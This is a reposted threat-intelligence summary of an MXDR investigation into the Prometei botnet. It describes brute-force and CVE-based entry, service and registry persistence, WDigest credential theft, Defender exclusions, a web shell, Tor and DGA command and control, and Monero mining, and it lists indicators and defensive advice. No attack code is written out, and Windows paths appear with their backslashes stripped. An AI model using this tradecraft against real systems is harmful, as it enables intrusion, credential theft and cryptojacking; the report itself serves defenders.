“Unveiling Prometei: Insights from Our MXDR Analysis”

hendryadrian.com

hendryadrian.com

In this MXDR investigation aided by Trend Vision One, analysts traced how the Prometei botnet infiltrated an environment and established a persistent, multi-component foothold focused on credential theft and cryptocurrency mining. The intrusion began with targeted brute-force login attempts from externally observed IPs that are tied to known Prometei infrastructure; following several failed logins the attackers achieved a successful authentication and leveraged RDP/SMB avenues and known vulnerabilities such as BlueKeep (CVE-2019-0708) and Microsoft Exchange CVEs to move further into the network. The initial compromise dropped installer artifacts into Windows directories (for example, C:Windowsdell and C:Windows), including files like zsvc.exe, sqhost.exe, and archives updates1.7z/updates2.7z which were extracted using a bundled 7z.exe.

The main installer binary (zsvc.exe / sqhost.exe, observed as a UPX-packed and custom-packed sample) unpacks its bot code if it finds a supporting file (mshlpda32.dll), otherwise it performs decoy reconnaissance such as writing systeminfo output to C:WindowsTempsetup_gitlog.txt before terminating. When installing with administrative privileges the malware creates a C:Windowsdell folder, writes registry keys under HKLMSOFTWAREIntelSupport (MachineKeyId, EncryptedMachineKeyId, CommId), and either uses or replaces existing keys found under HKLMSOFTWAREMicrosoftFax for configuration persistence. Installation actions include copying itself to C:Windows, deleting and recreating a UPlugPlay service configured to run sqhost.exe with the “Dcomsvc” parameter, setting that service to auto-start, renaming zsvc.exe to sqhost.exe, and adding firewall rules that allow sqhost.exe network traffic under the guise “Secure Socket Tunneling Protocol (HTTP)”. If administrative rights are not available it instead copies itself to %AppData%intelroaming and adds a HKCURun entry to persist as a per-user service.

Sqhost.exe functions as the primary bot binary: it connects to hardcoded C2 endpoints (HTTP, I2P, and .onion), verifies downloaded components with SHA-1 checksums, and uses PowerShell to download and extract additional modules such as 7z32.dll/7z32.exe and std.7z from hosts like 103.41.204[.]104. The malware also implements an XOR-based decryption routine on certain downloads (for example saving a downloaded file to C:Windowszsvc.exe then applying a byte-wise XOR/decrement loop before executing the result). A built-in command set supports operations like setting C2 servers, updating, fetching files (wget/xwget), starting and stopping mining (start_mining / stop_mining), and executing arbitrary commands or files (exec / call).

Credential theft is a central capability. Operators re-enable plaintext credential caching by adding the UseLogonCredential registry DWORD to the WDigest key, then run a customized Mimikatz-like component (miwalk.exe) that extracts credentials and dumps them into C:Windowsdellssldata2.dll. These stolen credentials are propagated laterally. The bot uses WMI (wmiprvse.exe parent processes) and .NET-based lateral modules (nethelper*.exe) to search for SQL servers and other network targets, attempting to deploy sqhost.exe onto newly discovered hosts. For RDP targeting the threat uses components such as rdpcIip.exe and a Socks.exe module that processes .cpass files containing candidate credentials and records successful logins to .cpass_good files.

To evade detection the actors add Windows Defender exclusions for directories such as C:Windows and C:WindowsDell via Add-MpPreference PowerShell commands and drop Base64-encoded payload fragments to disk (files with .b64 extensions) which are later decoded by PowerShell into executables or DLLs. The malware also regularly checks SHA-1 hashes on downloaded tools and uses a password-protected 7z extraction step (password observed as “horhor123”) to unpack payloads like srch.7z, which contains the mining binary SearchIndexer.exe.

Cryptojacking is a prominent post-compromise activity: SearchIndexer.exe masquerades as a legitimate Windows service and runs XMRig (version 6.18.0) to mine Monero, connecting to mining pools and stratum endpoints such as stratum+tcp://145.239.200.92:3333, 88.198.246[.]242:80, and others. The miner configuration is delivered from the C2 as a Base64-encoded desktop.dat that decodes into a stratum connection string and mining parameters.

Command-and-control in Prometei is resilient and multi-layered. The bot uses a Domain Generation Algorithm (DGA) to create numerous xincha* domains for fallback C2 reachability, performs DNS lookups against 8.8.8.8 to resolve generated names, hosts payloads on multiple IPs (e.g., 103.40.123.34, 103.41.204.104), and maintains an option to use Tor hidden services like https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi. The operators can deploy a portable Apache + PHP stack (AppServ180.zip) to C:ProgramDataMicrosoftAppServ which exposes a web shell (ssimple.php renamed to Shell-{random}.php) enabling command execution and file upload. The attackers hide the web server by creating a service KtmRmSvc pointing at taskhost.exe in the Apache2.2 bin folder, adding firewall rules, and copying php.ini into C:Windows to blend with legitimate files.

Additional propagation techniques observed include SSH-based spreader modules (windrlver.exe) initiating SSH sessions to external hosts and establishing SSH tunnels or transfers, Tor relays (smcard.exe) launching a local SOCKS proxy, and the use of nethelper assemblies to target database servers and install the bot across hosts. The bot’s components perform system reconnaissance (wmic queries, ver, last boot time) and persistently await commands from C2. Notable files and artifacts seen on disk include C:Windowsuplugplay, C:Windowsnetwalker, C:Windowsupdates1.7z, C:Windowsmshlpda32.dll, C:Windows7z.exe, and executables like sqhost.exe, miWalk64.exe/miWalk32.exe, windrlver.exe, and SearchIndexer.exe.

From a tooling and response perspective, Trend Vision One’s MXDR capabilities enabled investigators to detect sqhost.exe activity, retrieve AppServ180.zip for static analysis, and correlate events across endpoints to reduce dwell time. The collected evidence shows Prometei is modular, self-updating, and designed to adapt: it checks for existing installations, uses multiple C2 channels (HTTP, I2P, Tor), verifies download integrity, and applies obfuscation techniques like Base64 and custom XOR decryption. The actors behind Prometei are not definitively identified, but language artifacts and behavior (avoidance of Russian-language accounts and references to the Russian-derived name “Prometei”) suggest a Russian-speaking origin.

In conclusion, the Prometei campaign demonstrates an advanced, multi-stage threat that combines brute-force access, vulnerability exploitation, credential harvesting, lateral movement, persistence mechanisms, web shells, Tor-based C2, and cryptojacking. Defenders should prioritize timely patching of RDP/SMB and Exchange vulnerabilities, monitor for the listed file names, IPs, domains, and registry modifications (especially WDigest UseLogonCredential), hunt for suspicious PowerShell Base64 activity and service creation, and employ MXDR capabilities to correlate indicators and respond quickly. The investigation underscores how incident response, threat intelligence, and extended detection tooling together reduce an adversary’s window of operation and help contain complex botnet campaigns.

Read more: https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html